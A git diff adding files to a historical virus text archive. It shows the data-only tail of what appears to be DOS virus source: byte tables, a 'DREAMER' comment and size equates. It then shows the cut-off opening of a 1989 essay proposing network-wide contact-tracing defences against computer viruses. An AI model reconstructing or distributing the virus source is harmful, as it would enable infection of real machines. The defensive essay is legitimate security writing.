+        db 0B3h,062h,04Fh,0D6h,064h,0D4h,039h,05Fh,098h,06Fh,0C8h,03Ah,0B1h
+        db 04Eh,06Fh,0A4h,07Fh,0AAh,011h,097h,06Ah,09Bh,094h,049h,0C0h,045h
+        db 0AFh,080h,09Dh,098h,022h,0BFh,062h,0BDh,065h,047h,0B0h,040h,0BFh
+        db 070h,0ADh,070h,01Dh,0C9h,067h,089h,06Ch,07Fh,0D0h,060h,0BFh,072h
+        db 09Bh,080h,000h,08Dh,052h,0ABh,064h,055h,0DAh,078h,0CBh,0A8h,0AFh
+        db 080h,016h,09Fh,062h,0AFh,04Ch,03Dh,0C0h,062h,05Fh,0C8h,05Bh,0CEh
+        db 024h,01Bh,084h,06Bh,08Ch,060h,0BFh,0A4h,09Dh,0FFh,060h,0BCh,01Ah
+        db 000h,0B0h,066h,0CCh,054h,073h,0D8h,085h,09Bh,0C8h,055h,0C2h,020h
+        db 001h,072h,056h,069h,07Ch,0AAh,0A8h,07Bh,0AFh,080h,087h,090h,018h
+        db 065h,071h,065h,0C2h,095h,0DAh,0B1h,09Ch,0C5h,08Ah,07Bh,080h,03Dh
+        db 044h,051h,05Fh,06Ah,075h,089h,07Eh,082h,083h,080h,06Eh,064h,062h
+        db 066h,075h,083h,08Bh,0A2h,0A6h,0A9h,0BAh,08Bh,091h,076h,07Bh,07Eh
+        db 069h,07Bh,064h,06Dh,080h,075h,079h,06Ah,077h,07Ah,071h,078h,06Fh
+        db 082h,07Ah,083h,090h,088h,07Ch,07Dh,088h,085h,089h,08Ah,085h,083h
+        db 091h,086h,089h,085h,079h,07Fh,07Bh,083h,07Eh,077h,078h,083h,07Fh
+        db 082h,08Bh,076h,079h,075h,07Fh,090h,074h,079h,075h,077h,072h,085h
+        db 084h,076h,07Eh,074h,07Dh,07Eh,07Ah,080h,080h,07Fh,077h,07Eh,07Ah
+        db 080h,080h,07Fh,088h,07Ch,084h,07Fh,07Fh,080h,081h,07Eh,079h,08Ah
+        db 087h,086h,083h,08Dh,086h,07Ch,08Ch,07Ah,07Bh,073h,087h,098h,082h
+        db 083h,07Dh,083h,07Ch,075h,083h,06Dh,077h,073h,085h,085h,072h,07Ch
+        db 077h,082h,07Ah,07Ch,075h,06Bh,06Ch,073h,082h,073h,075h,07Eh,074h
+        db 081h,087h,08Dh,088h,080h,075h,07Fh,08Dh,083h,097h,084h,081h,083h
+        db 085h,080h,078h,07Dh,078h,07Fh,082h,087h,08Ch,078h,082h,081h,086h
+        db 082h,07Dh,081h,07Bh,074h,078h,084h,078h,084h,080h,07Eh,079h,075h
+        db 079h,072h,081h,07Dh,08Bh,07Eh,07Bh,086h,082h,086h,07Fh,07Eh,077h
+        db 076h,084h,07Eh,080h,074h,077h,07Fh,090h,08Ch,085h,07Ah,062h,06Ah
+        db 080h,08Ch,08Dh,07Eh,072h,07Bh,082h,089h,095h,08Ah,06Fh,07Ah,083h
+        db 082h,083h,07Bh,077h,07Ah,079h,082h,07Dh,06Eh,077h,06Eh,082h,07Eh
+        db 088h,07Dh,07Fh,078h,071h,081h,075h,07Ch,086h,07Fh,086h,07Eh,085h
+        db 081h,086h,087h,08Dh,08Ah,076h,07Ah,07Ah,086h,085h,08Ah,086h,085h
+        db 07Dh,077h,078h,06Eh,07Fh,07Ah,07Dh,07Eh,074h,083h,079h,088h,07Ah
+        db 084h,078h,073h,081h,079h,086h,083h,081h,07Fh,082h,094h,080h,080h
+        db 06Eh,069h,07Ch,078h,07Eh,07Bh,07Ch,072h,086h,090h,086h,07Dh,079h
+        db 07Eh,084h,08Bh,07Eh,080h,080h,072h,090h,088h,07Ch,079h,076h,07Bh
+        db 07Fh,086h,07Ah,081h,07Dh,07Dh,08Ah,07Ah,080h,070h,075h,07Eh,079h
+        db 085h,073h,076h,075h,087h,087h,088h,084h,07Ch,07Ah,076h,077h,07Bh
+        db 079h,083h,07Bh,081h,07Dh,07Ch,07Fh,080h,081h,07Fh,08Ah,082h,082h
+        db 08Ch,082h,086h,086h,08Ah,083h,080h,071h,073h,07Fh,077h,084h,087h
+        db 081h,07Bh,07Fh,07Fh,087h,086h,079h,083h,077h,087h,07Ch,07Ch,07Ch
+        db 075h,082h,071h,076h,07Ch,076h,079h,079h,082h,070h,080h,07Ah,081h
+        db 087h,084h,07Ah,070h,07Dh,06Fh,082h,084h,07Eh,081h,07Bh,07Dh,07Fh
+        db 08Fh,07Dh,07Ch,084h,07Eh,07Bh,086h,088h,07Eh,08Fh,089h,075h,08Ah
+        db 07Dh,079h,07Dh,080h,079h,07Fh,086h,077h,078h,07Dh,06Eh,08Dh,07Fh
+        db 074h,076h,07Eh,078h,078h,08Dh,079h,07Eh,082h,07Eh,080h,087h,079h
+        db 076h,082h,074h,07Eh,081h,06Eh,074h,081h,082h,081h,092h,07Bh,07Fh
+        db 08Fh,08Ah,08Bh,07Ch,070h,074h,08Fh,07Eh,084h,084h,06Fh,075h,07Ah
+        db 08Eh,07Bh,07Ch,078h,078h,083h,086h,08Eh,07Eh,082h,070h,07Dh,08Dh
+        db 078h,07Bh,06Fh,077h,076h,087h,085h,074h,079h,077h,07Dh,085h,084h
+        db 06Bh,07Eh,07Eh,077h,086h,088h,079h,07Dh,091h,07Bh,081h,09Bh,073h
+        db 080h,07Bh,07Bh,090h,084h,070h,07Bh,08Ah,078h,07Fh,081h,071h,07Fh
+        db 082h,080h,074h,081h,07Bh,06Dh,07Fh,070h,078h,089h,07Ch,077h,089h
+        db 08Ah,07Fh,086h,07Eh,072h,081h,073h,068h,07Fh,082h,073h,085h,08Ah
+        db 086h,09Eh,093h,07Bh,081h,086h,069h,07Dh,086h,06Ch,07Fh,088h,088h
+        db 08Fh,09Ch,08Ch,079h,086h,074h,067h,06Dh,064h,069h,077h,07Fh,084h
+        db 09Fh,085h,08Dh,09Bh,074h,071h,06Ch,05Dh,062h,07Dh,06Dh,073h,086h
+        db 090h,091h,097h,092h,07Ah,079h,07Ch,061h,06Dh,076h,073h,070h,088h
+        db 090h,094h,09Bh,09Bh,094h,078h,077h,078h,060h,05Dh,069h,07Bh,087h
+        db 090h,09Fh,09Dh,09Fh,0A1h,080h,076h,068h,053h,04Bh,066h,072h,072h
+        db 086h,099h,097h,0A2h,0ADh,082h,06Ah,064h,05Ah,053h,061h,06Ah,067h
+        db 08Ah,0ABh,0ADh,0ACh,09Bh,0A5h,060h,067h,066h,059h,056h,06Fh,093h
+        db 08Fh,0BFh,0A8h,08Eh,0AFh,0AAh,044h,04Fh,070h,041h,057h,08Dh,084h
+        db 07Dh,0D1h,094h,07Eh,0BEh,088h,02Dh,06Ah,070h,038h,07Bh,0ABh,063h
+        db 0AFh,0A0h,068h,075h,0CDh,064h,013h,087h,068h,02Fh,0ABh,0B4h,037h
+        db 097h,0E0h,050h,097h,0F8h,022h,063h,0D4h,02Ah,07Dh,0E6h,038h,02Fh
+        db 0F9h,080h,047h,0E7h,0DAh,010h,07Fh,084h,034h,0B7h,0B0h,01Dh,035h
+        db 0D7h,0C0h,04Fh,0A1h,0B2h,002h,06Fh,0DEh,014h,087h,040h,001h,077h
+        db 0FFh,0A0h,032h,0BDh,0E2h,05Bh,0D7h,0C0h,000h,095h,02Ah,000h,0A7h
+        db 0C8h,02Ch,057h,0AEh,0C4h,09Fh,0E2h,030h,03Bh,0DCh,04Ah,02Fh,0FCh
+        db 084h,03Ah,0A5h,0D3h,094h,0BBh,0D8h,020h,07Fh,0A0h,018h,033h,0FFh
+        db 06Ch,009h,0A7h,0E2h,03Ah,0AFh,08Ah,000h,087h,068h,020h,09Fh,0D0h
+        db 040h,05Bh,0FFh,088h,03Fh,0D5h,01Ch,027h,0A0h,036h,04Fh,0FFh,0A8h
+        db 042h,0EFh,0D0h,05Eh,0F3h,0A0h,000h,05Bh,045h,03Dh,0F5h,0B4h,01Eh
+        db 057h,0FFh,060h,087h,0DCh,000h,007h,084h,04Ch,07Dh,0FFh,071h,02Dh
+        db 0FFh,0C4h,037h,0CFh,064h,000h,06Fh,038h,03Dh,0FFh,0C0h,034h,09Bh
+        db 0FFh,054h,0A3h,0C2h,000h,05Fh,050h,01Ah,09Fh,0FFh,050h,03Fh,0FFh
+        db 08Ch,073h,0F7h,034h,000h,07Ah,048h,073h,0FFh,080h,029h,0EFh,0D8h
+        db 02Eh,0ABh,068h,000h,08Dh,036h,028h,0F3h,0D8h,044h,08Fh,0FFh,04Ah
+        db 0AFh,0DAh,000h,02Bh,030h,03Fh,0D3h,0E8h,05Ah,07Fh,0FFh,068h,097h
+        db 0E2h,000h,00Bh,021h,03Fh,0A7h,0FFh,06Ch,063h,0FFh,078h,073h,0DFh
+        db 050h,000h,000h,04Dh,09Fh,0FFh,082h,033h,0E7h,0C0h,059h,0AFh,098h
+        db 000h,02Bh,03Fh,062h,0F1h,0A6h,073h,0DFh,0FFh,040h,08Bh,0D0h,000h
+        db 000h,017h,05Fh,0FDh,0FFh,058h,08Fh,0FFh,06Dh,0B7h,0ECh,008h,000h
+        db 027h,07Bh,0C6h,0D2h,075h,097h,0FFh,060h,076h,0C8h,018h,000h,000h
+        db 065h,0AFh,0FFh,096h,073h,0FFh,088h,07Fh,0DAh,040h,000h,000h,07Bh
+        db 09Fh,0E0h,082h,069h,0FFh,0D4h,05Fh,066h,080h,000h,027h,049h,062h
+        db 09Dh,0AAh,099h,0FFh,0F8h,038h,096h,0D4h,000h,000h,027h,077h,0FFh
+        db 0FCh,068h,09Fh,0FFh,065h,0AFh,0D8h,000h,000h,02Fh,09Ah,07Fh,088h
+        db 06Dh,0CFh,0FFh,062h,06Dh,0B1h,028h,000h,019h,065h,0BFh,0F4h,062h
+        db 08Bh,0FFh,084h,077h,0EBh,054h,000h,000h,05Dh,0AFh,0FFh,08Ah,057h
+        db 0FFh,068h,069h,0ABh,084h,000h,000h,065h,099h,0FFh,09Ch,05Bh,0EFh
+        db 0E4h,09Dh,093h,09Ah,000h,000h,07Fh,093h,08Eh,089h,06Ch,0E5h,0FFh
+        db 05Dh,074h,0CFh,038h,000h,023h,079h,09Bh,0DEh,091h,0AFh,0FFh,05Ch
+        db 073h,0A7h,084h,000h,000h,046h,09Fh,0FFh,080h,053h,0DFh,0E4h,077h
+        db 08Ah,0B8h,000h,000h,06Bh,089h,0A4h,084h,085h,0BFh,0FFh,050h,02Bh
+        db 0C7h,068h,000h,00Fh,055h,0B5h,0FFh,0D0h,014h,0CFh,084h,059h,0DDh
+        db 0C0h,000h,000h,08Fh,0B6h,0CBh,09Ah,050h,0D7h,0FFh,026h,055h,0A2h
+        db 008h,000h,03Bh,06Ch,08Ah,0D3h,094h,083h,0FFh,082h,091h,0E7h,060h
+        db 000h,00Ch,095h,082h,09Ch,0B3h,07Ah,0E7h,0FEh,028h,059h,0D7h,058h
+        db 000h,001h,03Fh,0BFh,0FFh,078h,063h,0FFh,086h,0B3h,0FFh,040h,000h
+        db 000h,06Dh,08Fh,0D9h,0A1h,060h,0B3h,0D2h,0C7h,074h,048h,000h,045h
+        db 04Bh,03Bh,097h,0B8h,0A2h,0D3h,0FFh,064h,071h,0CEh,004h,00Bh,01Bh
+        db 052h,07Bh,0C1h,0F6h,0A4h,0C5h,0C0h,065h,072h,0C6h,000h,000h,00Ah
+        db 03Fh,0DFh,0FFh,058h,06Bh,0FAh,044h,0A7h,0FFh,028h,000h,03Bh,0BDh
+        db 0FAh,0FFh,088h,07Bh,0FFh,058h,062h,057h,060h,000h,000h,043h,08Bh
+        db 0FFh,098h,06Ah,0E7h,0D0h,062h,08Ah,0B0h,000h,005h,05Fh,0B5h,0B2h
+        db 0A4h,072h,0D7h,0FFh,038h,087h,088h,01Ch,027h,053h,06Ah,09Dh,0FFh
+        db 070h,075h,0FDh,048h,063h,0C5h,080h,000h,015h,06Bh,0B7h,0FFh,084h
+        db 048h,0A7h,0E0h,061h,0B3h,088h,000h,031h,03Eh,062h,09Bh,0ECh,058h
+        db 05Bh,0FFh,054h,06Bh,0B5h,0A0h,000h,000h,061h,091h,0FFh,090h,043h
+        db 0EFh,0B8h,09Ah,09Fh,0A8h,000h,027h,031h,05Bh,09Ch,0BAh,0B0h,0BFh
+        db 0F5h,04Ah,07Fh,0E5h,042h,000h,000h,056h,0BBh,0FFh,090h,03Fh,0FFh
+        db 090h,0BFh,0D7h,094h,000h,000h,05Fh,08Eh,0FFh,080h,04Eh,0A5h,0D8h
+        db 07Fh,064h,094h,000h,000h,03Bh,088h,074h,068h,0BFh,0FBh,0FFh,04Ah
+        db 05Fh,0A5h,092h,015h,000h,01Fh,07Bh,0FFh,0FFh,052h,0DFh,050h,09Fh
+        db 0D3h,0C0h,000h,000h,053h,08Dh,0FFh,098h,036h,087h,0D4h,08Bh,06Dh
+        db 0B4h,000h,000h,035h,07Dh,0CBh,0F8h,0BAh,074h,0FFh,078h,075h,09Ah
+        db 050h,000h,000h,0AEh,082h,073h,0A6h,0B0h,0FFh,0C8h,03Bh,052h,099h
+        db 032h,000h,023h,044h,07Fh,0FFh,0FFh,058h,087h,046h,07Bh,0F3h,0CAh
+        db 000h,000h,05Fh,0CAh,0FFh,0FEh,024h,077h,0B8h,039h,076h,0B4h,00Eh
+        db 000h,02Bh,08Eh,0ABh,0FFh,070h,063h,0FFh,080h,09Ch,0BBh,054h,000h
+        db 00Fh,06Ah,0A5h,0D6h,09Ah,099h,0DDh,0D4h,056h,067h,094h,000h,000h
+        db 01Dh,066h,0BBh,0FFh,070h,067h,0D0h,06Fh,096h,0DEh,048h,000h,036h
+        db 06Fh,09Ah,0FFh,070h,027h,0C9h,056h,06Ch,08Fh,084h,000h,023h,057h
+        db 086h,0FFh,0F4h,080h,04Fh,0F5h,06Eh,082h,0C9h,020h,000h,003h,05Bh
+        db 099h,0FFh,0C0h,03Ch,0EBh,080h,08Fh,09Dh,0A8h,006h,00Eh,056h,077h
+        db 0DFh,0FFh,060h,07Fh,0B0h,06Eh,062h,0CEh,01Ah,017h,047h,05Dh,085h
+        db 0FFh,0FFh,040h,097h,05Ah,05Eh,06Fh,0B4h,000h,037h,050h,07Fh,0ABh
+        db 0FFh,0D8h,000h,0A7h,040h,047h,07Fh,08Ch,01Ch,023h,06Dh,080h,0C7h
+        db 0FFh,080h,019h,0D2h,030h,056h,09Fh,070h,018h,02Dh,086h,0A8h,0FFh
+        db 0FFh,070h,08Fh,0A0h,03Ch,018h,09Fh,070h,00Ah,053h,095h,099h,0FFh
+        db 0FFh,044h,08Bh,088h,02Dh,00Fh,0ADh,044h,006h,067h,0A2h,085h,0EBh
+        db 0FFh,030h,04Fh,094h,013h,000h,0BBh,035h,037h,083h,08Ch,093h,0FFh
+        db 0FFh,040h,06Dh,0A8h,023h,027h,0AFh,034h,047h,072h,092h,07Fh,0EBh
+        db 0FFh,054h,04Bh,0C0h,039h,044h,09Dh,054h,055h,075h,0C6h,084h,096h
+        db 0FFh,0A0h,033h,0BFh,04Ch,02Ch,056h,08Ah,055h,087h,0B3h,062h,051h
+        db 0C7h,0DCh,02Eh,08Fh,094h,020h,02Ah,07Dh,06Eh,0BDh,0ACh,06Ch,04Ch
+        db 0A3h,0FFh,080h,03Eh,0B3h,030h,02Ah,04Dh,08Eh,04Dh,095h,0A3h,06Ch
+        db 057h,0AFh,0FFh,060h,05Bh,0D5h,032h,04Fh,06Fh,064h,05Eh,0CDh,0A0h
+        db 03Ah,06Fh,0CDh,0C0h,04Ah,082h,0DBh,02Ch,06Dh,04Bh,04Eh,087h,0B8h
+        db 06Bh,058h,07Fh,09Eh,0CCh,072h,073h,0D5h,030h,06Fh,067h,048h,05Bh
+        db 0BAh,09Ch,058h,07Dh,099h,0D4h,094h,06Ch,0C3h,04Ch,079h,03Eh,025h
+        db 06Bh,0D4h,078h,072h,07Bh,07Ah,0BBh,0C1h,04Ah,08Bh,088h,02Bh,058h
+        db 034h,046h,0DDh,09Ah,080h,072h,06Ch,08Fh,0FFh,070h,013h,0B1h,030h
+        db 086h,055h,05Fh,0C7h,0B4h,082h,075h,087h,08Dh,0FFh,078h,000h,0A7h
+        db 058h,07Bh,070h,03Ah,05Bh,0BCh,08Eh,0A8h,0ACh,034h,08Fh,0D8h,028h
+        db 05Bh,0E0h,028h,07Fh,059h,029h,0ABh,0CCh,064h,06Bh,080h,049h,0AFh
+        db 0D0h,023h,07Fh,0B0h,00Eh,089h,061h,02Fh,0B7h,0B2h,070h,092h,088h
+        db 06Fh,0EFh,090h,023h,09Bh,0B4h,035h,08Ch,03Dh,03Fh,0D3h,094h,08Bh
+        db 0C7h,060h,03Bh,0B9h,082h,069h,0CFh,0A0h,027h,084h,02Ah,04Bh,0EFh
+        db 08Ch,07Eh,08Ch,050h,05Fh,0E3h,079h,04Fh,0AFh,078h,01Bh,081h,02Ch
+        db 03Dh,0D3h,078h,077h,0B3h,066h,055h,0BFh,082h,069h,0B2h,0A8h,025h
+        db 08Ah,035h,043h,0D3h,09Ch,07Bh,09Bh,05Ah,03Dh,0AFh,0C6h,07Fh,077h
+        db 07Fh,062h,06Ah,096h,05Dh,073h,0AAh,06Ah,08Ch,08Ah,054h,04Fh,08Eh
+        db 0AAh,07Bh,06Fh,09Ch,070h,05Dh,084h,056h,07Fh,0C5h,085h,073h,060h
+        db 05Ah,071h,0C3h,0A8h,050h,056h,064h,071h,087h,0ACh,04Bh,071h,088h
+        db 074h,0A4h,08Bh,085h,069h,072h,0A9h,090h,067h,07Ch,0A8h,038h,07Fh
+        db 088h,05Bh,07Fh,0A5h,06Ah,073h,0B9h,05Bh,056h,0B2h,05Ah,042h,0A2h
+        db 0CCh,044h,037h,079h,055h,073h,0E2h,0A5h,06Bh,091h,062h,056h,0B7h
+        db 0ACh,051h,05Fh,0A1h,090h,02Eh,0A3h,07Eh,045h,09Fh,0A2h,07Ch,095h
+        db 08Ah,070h,067h,0AEh,074h,055h,0A7h,0DBh,018h,033h,066h,06Ch,07Bh
+        db 0C3h,090h,049h,07Dh,093h,076h,0B3h,0B0h,041h,046h,0A3h,08Dh,02Ah
+        db 08Fh,075h,046h,087h,0B2h,07Bh,07Eh,091h,06Eh,071h,09Fh,08Ah,069h
+        db 070h,092h,08Ah,04Fh,096h,090h,056h,07Dh,090h,084h,07Dh,0A1h,086h
+        db 066h,084h,08Bh,073h,081h,080h,084h,072h,089h,082h,06Bh,06Eh,07Fh
+        db 080h,077h,079h,095h,091h,059h,059h,081h,070h,069h,08Bh,08Eh,088h
+        db 059h,07Ch,06Dh,097h,083h,06Eh,07Fh,087h,093h,087h,078h,05Ch,078h
+        db 098h,07Eh,077h,08Fh,097h,062h,067h,080h,066h,07Eh,0A1h,07Ah,07Dh
+        db 089h,095h,078h,055h,073h,092h,08Ch,077h,07Dh,096h,092h,04Ah,05Fh
+        db 06Eh,087h,092h,08Ch,082h,085h,092h,078h,058h,06Ch,092h,073h,073h
+        db 086h,08Eh,07Fh,05Eh,04Ah,06Ch,073h,092h,0A0h,07Eh,090h,097h,08Bh
+        db 073h,070h,078h,089h,089h,075h,079h,08Fh,08Eh,07Ah,040h,05Fh,07Ch
+        db 086h,085h,0A2h,0A9h,084h,07Fh,075h,05Ch,073h,09Ch,076h,061h,07Fh
+        db 079h,075h,092h,082h,031h,069h,086h,076h,09Fh,0B1h,07Eh,073h,092h
+        db 06Bh,067h,097h,087h,074h,078h,07Ah,085h,099h,065h,067h,088h,054h
+        db 069h,085h,084h,087h,0A3h,08Ch,078h,09Fh,086h,053h,067h,07Ch,068h
+        db 075h,092h,078h,072h,07Ch,062h,07Dh,0AFh,090h,06Bh,07Ch,06Eh,068h
+        db 08Fh,0A0h,078h,06Ah,072h,075h,08Dh,08Ch,07Eh,089h,072h,054h,072h
+        db 08Bh,089h,07Fh,072h,06Bh,08Ah,0A2h,089h,08Fh,085h,066h,071h,093h
+        db 088h,074h,078h,06Dh,070h,08Ah,088h,089h,08Dh,072h,06Bh,080h,078h
+        db 079h,070h,069h,06Ch,07Ch,08Bh,082h,08Bh,078h,06Ah,087h,081h,07Eh
+        db 08Eh,070h,05Fh,079h,085h,07Fh,087h,07Ah,05Fh,08Ah,0A4h,076h,079h
+        db 080h,06Ah,069h,075h,07Eh,093h,0A5h,081h,072h,088h,088h,085h,090h
+        db 078h,060h,071h,07Bh,07Fh,084h,07Ah,068h,07Ah,08Ch,07Fh,07Ah,070h
+        db 068h,076h,07Ch,077h,093h,0A2h,080h,086h,07Dh,07Bh,083h,08Eh,068h
+        db 064h,074h,06Eh,077h,097h,074h,068h,080h,080h,071h,08Bh,07Ch,059h
+        db 079h,08Ah,074h,099h,09Ch,066h,07Fh,0A6h,07Fh,08Fh,0A0h,056h,06Dh
+        db 0A2h,06Ch,07Dh,09Dh,060h,05Fh,098h,072h,063h,097h,088h,048h,07Dh
+        db 085h,069h,0A3h,088h,04Eh,063h,09Fh,091h,077h,08Ch,074h,042h,085h
+        db 09Ch,06Ch,095h,066h,051h,08Fh,0CFh,07Ah,073h,09Ah,080h,065h,097h
+        db 080h,05Ah,081h,04Ch,04Ah,09Eh,09Ch,074h,07Fh,083h,086h,097h,09Ah
+        db 069h,07Fh,08Ch,060h,06Fh,0A0h,077h,06Eh,08Ch,08Eh,07Dh,083h,083h
+        db 064h,07Ah,074h,05Eh,079h,09Fh,07Ah,063h,083h,092h,069h,091h,088h
+        db 052h,075h,070h,069h,08Fh,0A0h,06Bh,074h,0ABh,08Eh,062h,08Dh,066h
+        db 063h,08Ah,071h,07Bh,0BBh,098h,068h,087h,0A4h,077h,097h,08Ch,044h
+        db 056h,069h,071h,0A7h,094h,05Dh,05Eh,0A4h,07Ch,077h,08Eh,05Ch,04Dh
+        db 07Eh,074h,07Bh,0ACh,078h,059h,0A3h,0A4h,060h,082h,084h,049h,075h
+        db 081h,07Eh,0ADh,0A5h,071h,07Fh,0BAh,074h,071h,084h,04Ah,05Bh,073h
+        db 071h,087h,0ADh,07Ch,062h,0ADh,093h,073h,097h,06Ah,03Fh,070h,077h
+        db 07Bh,0B5h,088h,058h,08Bh,0A8h,061h,079h,080h,045h,06Eh,075h,071h
+        db 09Bh,0B2h,072h,06Bh,0B0h,080h,078h,096h,061h,042h,05Fh,073h,08Dh
+        db 0B4h,088h,068h,0A3h,096h,06Fh,08Dh,07Ch,04Ah,05Eh,06Ch,07Fh,0BBh
+        db 0A0h,070h,08Fh,0B0h,07Eh,07Fh,08Ah,040h,030h,063h,086h,0AFh,0ACh
+        db 066h,063h,0B3h,080h,07Ch,07Eh,04Ch,03Fh,059h,079h,096h,09Bh,084h
+        db 077h,0ADh,090h,071h,085h,080h,03Eh,041h,073h,093h,0D3h,0B2h,076h
+        db 091h,09Ah,083h,0A3h,090h,040h,038h,05Bh,08Ah,0A7h,088h,071h,086h
+        db 090h,06Bh,07Eh,083h,052h,043h,057h,08Bh,0BBh,0C0h,080h,07Fh,0AAh
+        db 068h,07Bh,094h,050h,030h,048h,076h,09Dh,0A6h,07Dh,072h,0A7h,07Ah
+        db 069h,07Ah,07Dh,054h,065h,06Ch,085h,0A9h,0AAh,095h,0B2h,09Ch,059h
+        db 089h,0A1h,04Ch,049h,060h,07Eh,0C3h,0C0h,080h,083h,0A9h,067h,07Bh
+        db 08Dh,060h,03Ch,05Ah,085h,081h,07Eh,079h,08Dh,0B3h,060h,05Bh,07Bh
+        db 064h,03Dh,053h,06Ch,093h,0B5h,090h,08Ah,0BBh,07Ah,06Fh,08Fh,076h
+        db 046h,05Fh,070h,087h,0B3h,08Ch,07Ch,0AEh,078h,059h,085h,07Eh,048h
+        db 050h,07Bh,09Dh,0C1h,0A1h,08Fh,09Fh,098h,073h,085h,07Ch,048h,055h
+        db 07Ah,083h,083h,08Bh,08Bh,0A0h,0A8h,068h,06Fh,087h,05Eh,04Ah,061h
+        db 083h,095h,0A1h,090h,08Fh,0A8h,068h,067h,07Fh,062h,03Ah,056h,06Eh
+        db 097h,0B3h,087h,076h,09Fh,096h,06Ah,083h,080h,043h,056h,07Eh,088h
+        db 087h,08Fh,090h,0ADh,0B4h,060h,066h,08Dh,06Dh,044h,05Ch,075h,096h
+        db 0CAh,08Ch,063h,098h,071h,079h,087h,078h,044h,04Bh,083h,097h,09Bh
+        db 08Ah,07Ch,09Eh,0ACh,061h,05Fh,07Fh,062h,04Ah,067h,08Ah,095h,0BBh
+        db 098h,08Ch,0BDh,084h,085h,091h,06Ch,045h,059h,085h,08Bh,095h,08Bh
+        db 083h,0A4h,08Ch,04Dh,06Ah,08Bh,060h,048h,05Eh,07Fh,0ADh,0CCh,07Ch
+        db 068h,09Ch,064h,083h,089h,054h,036h,04Fh,07Dh,096h,0AFh,088h,072h
+        db 086h,0A0h,08Bh,074h,05Bh,04Dh,073h,078h,087h,09Eh,09Dh,092h,0A5h
+        db 0BCh,076h,07Bh,085h,059h,055h,06Ch,081h,093h,0A7h,0A1h,07Bh,07Ch
+        db 084h,06Dh,07Ch,07Bh,042h,039h,057h,07Dh,0C5h,0ACh,05Ah,071h,092h
+        db 06Ah,08Ah,09Fh,061h,046h,06Eh,099h,0BBh,0ABh,076h,073h,0A4h,068h
+        db 069h,06Fh,061h,036h,04Dh,07Bh,09Fh,0D1h,0A2h,081h,0B2h,098h,07Eh
+        db 093h,086h,04Bh,04Dh,077h,08Dh,0A7h,092h,07Ah,09Dh,0A0h,057h,072h
+        db 07Ah,05Ch,063h,065h,06Fh,09Fh,0CDh,08Dh,074h,09Ch,060h,063h,089h
+        db 070h,035h,046h,070h,095h,0C6h,090h,061h,085h,094h,06Ah,07Fh,07Eh
+        db 04Ah,05Ch,066h,076h,0A5h,0BAh,090h,087h,0BAh,082h,07Eh,095h,086h
+        db 04Ch,054h,07Dh,09Eh,0C9h,0A0h,06Ch,093h,086h,065h,073h,078h,03Dh
+        db 058h,065h,06Fh,08Ah,0AAh,090h,094h,0A1h,055h,062h,08Bh,068h,03Eh
+        db 04Ch,06Ch,09Bh,0D8h,090h,06Eh,0ACh,086h,07Dh,092h,076h,044h,052h
+        db 073h,089h,0B9h,096h,06Eh,08Dh,0A2h,065h,06Dh,084h,04Ah,05Dh,079h
+        db 090h,085h,094h,0ADh,0BBh,0C4h,066h,062h,083h,08Eh,056h,054h,068h
+        db 07Bh,0BFh,0BCh,070h,082h,063h,06Eh,08Dh,085h,040h,04Ah,069h,085h
+        db 0BDh,090h,05Ch,075h,09Ah,073h,07Bh,088h,050h,053h,074h,087h,097h
+        db 0ADh,08Eh,085h,0B3h,080h,073h,07Bh,076h,048h,059h,098h,092h,088h
+        db 08Ch,099h,0B6h,0A8h,05Bh,064h,081h,05Ch,050h,058h,066h,085h,0BFh
+        db 0A6h,072h,082h,057h,077h,0A5h,07Ch,04Dh,062h,07Bh,092h,0CAh,088h
+        db 054h,095h,080h,069h,07Bh,080h,04Ch,059h,07Ah,092h,0B5h,0B0h,079h
+        db 08Dh,09Ah,07Fh,07Fh,084h,057h,056h,076h,091h,09Fh,0A2h,088h,08Ah
+        db 0A5h,06Ah,06Dh,075h,05Ch,049h,062h,079h,087h,0BEh,099h,066h,08Eh
+        db 076h,07Eh,08Bh,074h,04Dh,05Bh,077h,089h,0AFh,0A0h,061h,07Bh,082h
+        db 065h,077h,08Eh,068h,068h,073h,08Eh,0A6h,0CAh,08Dh,065h,087h,08Bh
+        db 084h,076h,07Ch,054h,063h,075h,08Ah,0ADh,0B5h,078h,077h,093h,06Fh
+        db 07Bh,086h,060h,05Dh,068h,07Ah,093h,0C5h,08Ch,055h,083h,069h,071h
+        db 076h,072h,056h,05Ch,06Bh,081h,0ADh,0C4h,080h,067h,07Ah,061h,077h
+        db 096h,07Ah,072h,06Dh,07Eh,095h,0C2h,0B8h,064h,06Fh,072h,069h,078h
+        db 09Ah,078h,06Eh,073h,087h,0A7h,0CEh,098h,050h,07Eh,073h,074h,07Dh
+        db 088h,062h,066h,07Fh,091h,09Fh,0C3h,080h,058h,07Eh,060h,065h,081h
+        db 078h,057h,05Fh,088h,08Ch,0A0h,0B5h,076h,057h,070h,058h,070h,094h
+        db 075h,05Ch,077h,09Ch,08Ah,0A3h,0B8h,068h,05Fh,08Ch,06Dh,06Ah,095h
+        db 07Bh,06Bh,085h,093h,08Ah,0AFh,0B0h,064h,05Fh,08Fh,063h,069h,08Fh
+        db 067h,063h,07Dh,08Ah,082h,0A9h,0A8h,05Eh,05Dh,08Ah,060h,06Ah,089h
+        db 074h,073h,07Fh,092h,07Ch,089h,0B3h,081h,05Fh,093h,072h,066h,07Ah
+        db 08Eh,07Eh,089h,094h,080h,07Eh,09Fh,098h,064h,088h,              
+slutt:               ; DREAMER has a weird sense of humor
+
+size    equ $-100h
+pgf     equ ($+16)/16
diff --git a/textfiles.com/virus/hormones.vir b/textfiles.com/virus/hormones.vir
new file mode 100644
index 00000000..ef8ae88d
--- /dev/null
+++ b/textfiles.com/virus/hormones.vir
@@ -0,0 +1,379 @@
+Date: Thu, 16 Mar 89 20:56:18 +0100
+From: David Stodolsky <stodol@diku.dk>
+
+Net Hormones: Part 1 - 
+Infection Control assuming Cooperation among Computers
+
+Copyright (c) 1989 David S. Stodolsky, PhD. All rights reserved.
+
+1.   Abstract
+
+A new type of infection control mechanism based upon contact tracing is 
+introduced. Detection of an infectious agent triggers an alerting 
+response that propagates through an affected network. A result of the 
+alert is containment of the infectious agent as all hosts at risk 
+respond automatically to restrict further transmission of the agent. 
+Individually specified diagnostic and treatment methods are then 
+activated to identify and destroy the infective agent. The title "Net 
+Hormones" was chosen to indicate the systemic nature of this programmed 
+response to infection.
+
+2.   Introduction
+
+A new type of infection control mechanism that is based upon network-
+wide communication and that depends upon cooperation among computer 
+systems is presented. Neither diagnosis nor treatment is necessary for 
+the operation of the mechanism. The mechanism can automatically trigger 
+responses leading to effective containment of an infection. The 
+identification and destruction of the infectious agent is determined by 
